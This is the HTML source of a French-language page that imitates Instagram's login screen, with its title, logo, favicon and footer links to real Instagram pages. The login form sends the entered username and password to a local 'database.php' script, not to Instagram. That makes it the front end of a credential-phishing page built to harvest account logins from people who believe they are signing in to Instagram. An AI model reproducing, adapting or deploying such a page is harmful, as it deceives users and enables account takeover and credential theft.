<!DOCTYPE html>
<html>
    <head>
        <title>Connexion • Instagram</title>
        <meta charset="utf-8">
        <link rel="stylesheet" type="text/css" href="css/styles.css">
        <link rel="shortcut icon" href="img/instagram.ico">
    </head>
    <body>
        <!-- LOGO INSTAGRAM -->
        <header>
            <img class="instagram-logo-lettre" src="img/instagram-logo-lettre.jpg">
        </header>
        <!-- LOGIN -->
        <div class="login">
            <form action="database.php" method="post" class="form">
                <input type="text" name="utilisateur" placeholder="Numéro de téléphone, nom d’utilisateur ou adresse e-mail" class ="userpass">
                <br>
                <input type="password" name="mdp" placeholder="Mot de passe" class="userpass">
                <br>
                <input type="submit" name="submit" value="Connexion" class="submit">
            </form>
        </div>
        <!-- PAS DE COMPTE -->
        <div class="no-login">
            <p>
                Vous n'avez pas de compte ? <a href="https://www.instagram.com/accounts/emailsignup" class="no-login-link">Inscrivez-vous</a>
            </p>
        </div>
        <!-- LIENS BAS DE PAGE -->
        <div class="footer">
            <nav class="menu">
                <ul>
                    <li class="menu-1">
                        <a href="https://about.instagram.com/">à propos
				</a>
                    </li>
                    <li class="menu-1">
                        <a href="https://help.instagram.com/">aide
				</a>
                    </li>
                    <li class="menu-1">
                        <a href="https://about.instagram.com/blog/">presse
				</a>
                    </li>
                    <li class="menu-1">
                        <a href="https://www.instagram.com/developer/">api
				</a>
                    </li>
                    <li class="menu-1">
                        <a href="https://www.instagram.com/about/jobs/">emplois
				</a>
                    </li>
                    <li class="menu-1">
                        <a href="https://www.instagram.com/legal/privacy/">confidentialité
				</a>
                    </li>
                    <li class="menu-1">
                        <a href="https://www.instagram.com/legal/terms/">conditions
				</a>
                    </li>
                    <li class="menu-1">
                        <a href="https://www.instagram.com/explore/locations/">lieux
				</a>
                    </li>
                </ul>
            </nav>
        </div>
    </body>
</html>
